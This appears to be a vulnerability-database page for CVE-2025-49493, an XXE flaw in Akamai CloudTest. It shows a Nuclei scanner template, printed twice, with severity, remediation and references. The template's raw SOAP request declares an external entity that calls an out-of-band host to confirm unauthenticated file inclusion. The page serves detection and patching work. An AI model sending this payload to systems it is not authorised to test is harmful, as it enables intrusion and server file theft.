Akamai CloudTest < 60 2025.06.02 - XML External Entity (XXE)

CVE-2025-49493

Verified

Description

Akamai CloudTest before 60 2025.06.02 (12988) allows file inclusion via XML External Entity (XXE) injection.

Severity

Critical

CVSS Score

9.1

Exploit Probability

Affected Product

cloudtest

Published Date

July 1, 2025

Template Author

xbow, 3th1c_yuk1

CVE-2025-49493.yaml

id: CVE-2025-49493

info:
  name: Akamai CloudTest < 60 2025.06.02 - XML External Entity (XXE)
  author: xbow,3th1c_yuk1
  severity: critical
  description: |
    Akamai CloudTest before 60 2025.06.02 (12988) allows file inclusion via XML External Entity (XXE) injection.
  impact: |
    Unauthenticated attackers can exploit XXE injection to read arbitrary files from the server through malicious XML entities in SOAP requests.
  remediation: |
    Upgrade Akamai CloudTest to version 60 2025.06.02 (12988) or later that properly disables external entity processing.
  reference:
    - https://xbow.com/blog/xbow-akamai-cloudtest-xxe/
    - https://techdocs.akamai.com/cloudtest/changelog/june-2-2025-enhancements-and-bug-fixes
    - https://nvd.nist.gov/vuln/detail/CVE-2025-49493
  classification:
    epss-score: 0.01863
    epss-percentile: 0.83541
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2025-49493
    cwe-id: CWE-611
    cpe: cpe:2.3:a:akamai:cloudtest:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"Akamai CloudTest"
    vendor: akamai
    product: cloudtest
  tags: cve,cve2025,akamai,cloudtest,xxe,oast,rce,vkev,vuln

http:
  - raw:
      - |
        POST /concerto/services/RepositoryService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/html
        SOAPAction: ""

        <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE soapenv:Envelope [
          <!ENTITY xxe SYSTEM "http://{{interactsh-url}}">
        ]>
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                          xmlns:rep="http://example.com/services/repository">
           <soapenv:Header/>
           <soapenv:Body>
              <rep:getUIBundleObjectXml>
                 <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
              </rep:getUIBundleObjectXml>
           </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(content_type, "text/xml")'
          - 'contains(body, "XML stream")'
        condition: and
# digest: 4a0a0047304502205220ffed144c738f6317e8f52804368391160209a0ea8de90e0a27782f69a40b022100d4430893fd79ce9feeafe3e770fd40a16b1821659c3bc8d148fb83ecb8635479:922c64590222798bb761d5b6d8e72950

9.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

CVE ID:

cve-2025-49493

CWE ID:

cwe-611

References

https://xbow.com/blog/xbow-akamai-cloudtest-xxe/https://techdocs.akamai.com/cloudtest/changelog/june-2-2025-enhancements-and-bug-fixes https://nvd.nist.gov/vuln/detail/CVE-2025-49493

Remediation Steps

Upgrade Akamai CloudTest to version 60 2025.06.02 (12988) or later that properly disables external entity processing.

id: CVE-2025-49493

info:
  name: Akamai CloudTest < 60 2025.06.02 - XML External Entity (XXE)
  author: xbow,3th1c_yuk1
  severity: critical
  description: |
    Akamai CloudTest before 60 2025.06.02 (12988) allows file inclusion via XML External Entity (XXE) injection.
  impact: |
    Unauthenticated attackers can exploit XXE injection to read arbitrary files from the server through malicious XML entities in SOAP requests.
  remediation: |
    Upgrade Akamai CloudTest to version 60 2025.06.02 (12988) or later that properly disables external entity processing.
  reference:
    - https://xbow.com/blog/xbow-akamai-cloudtest-xxe/
    - https://techdocs.akamai.com/cloudtest/changelog/june-2-2025-enhancements-and-bug-fixes
    - https://nvd.nist.gov/vuln/detail/CVE-2025-49493
  classification:
    epss-score: 0.01863
    epss-percentile: 0.83541
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2025-49493
    cwe-id: CWE-611
    cpe: cpe:2.3:a:akamai:cloudtest:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"Akamai CloudTest"
    vendor: akamai
    product: cloudtest
  tags: cve,cve2025,akamai,cloudtest,xxe,oast,rce,vkev,vuln

http:
  - raw:
      - |
        POST /concerto/services/RepositoryService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/html
        SOAPAction: ""

        <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE soapenv:Envelope [
          <!ENTITY xxe SYSTEM "http://{{interactsh-url}}">
        ]>
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                          xmlns:rep="http://example.com/services/repository">
           <soapenv:Header/>
           <soapenv:Body>
              <rep:getUIBundleObjectXml>
                 <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
              </rep:getUIBundleObjectXml>
           </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(content_type, "text/xml")'
          - 'contains(body, "XML stream")'
        condition: and
# digest: 4a0a0047304502205220ffed144c738f6317e8f52804368391160209a0ea8de90e0a27782f69a40b022100d4430893fd79ce9feeafe3e770fd40a16b1821659c3bc8d148fb83ecb8635479:922c64590222798bb761d5b6d8e72950

Akamai CloudTest < 60 2025.06.02 - XML External Entity (XXE)

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Akamai CloudTest < 60 2025.06.02 - XML External Entity (XXE)

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps